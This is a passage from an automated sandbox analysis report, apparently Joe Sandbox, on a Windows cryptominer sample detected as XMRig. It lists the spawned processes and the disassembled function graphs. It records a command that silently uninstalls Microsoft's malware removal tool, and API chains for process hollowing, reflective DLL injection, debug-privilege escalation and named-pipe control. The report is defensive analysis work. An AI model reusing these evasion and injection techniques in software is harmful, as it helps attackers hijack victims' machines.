                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      General

                                                      Target ID:44
                                                      Start time:17:09:19
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7494f0000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:45
                                                      Start time:17:09:19
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:46
                                                      Start time:17:09:20
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:47
                                                      Start time:17:09:20
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:50
                                                      Start time:17:09:20
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:51
                                                      Start time:17:09:20
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:53
                                                      Start time:17:09:23
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:54
                                                      Start time:17:09:23
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:55
                                                      Start time:17:09:25
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:56
                                                      Start time:17:09:26
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:57
                                                      Start time:17:09:27
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:58
                                                      Start time:17:09:27
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:59
                                                      Start time:17:09:28
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:60
                                                      Start time:17:09:28
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FF74AA01140 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1844125143.00007FF74AA01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF74AA00000, based on PE: true
                                                        • Associated: 00000000.00000002.1844098310.00007FF74AA00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1844145785.00007FF74AA0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1844164705.00007FF74AA0F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1844274241.00007FF74AA10000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1844901576.00007FF74AF08000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1844935342.00007FF74AF40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1844951110.00007FF74AF43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff74aa00000_loader.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                        • Instruction ID: 4609e0ee81e335ae8f7074166374ba9d92a36260f806cb431012c3ae77191462
                                                        • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                        • Instruction Fuzzy Hash: 01B09220A0D209C4F2043F2198416A862606B28740FE04070D50C02352CA6D50464B30

                                                        Execution Graph

                                                        Execution Coverage:46.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:67%
                                                        Total number of Nodes:227
                                                        Total number of Limit Nodes:23
                                                        execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                        Callgraph

                                                        Executed Functions

                                                        Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                        • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                        • API String ID: 4177739653-1130149537
                                                        • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                        • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                        • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                        Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                        • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                        • API String ID: 2561231171-3753927220
                                                        • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                        • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                        • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                        Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                        • String ID:
                                                        • API String ID: 4084875642-0
                                                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                        Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                        • String ID:
                                                        • API String ID: 3197395349-0
                                                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                        Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                        • OpenProcess.KERNEL32 ref: 0000000140001859
                                                        • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                        • CloseHandle.KERNEL32 ref: 0000000140001875
                                                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
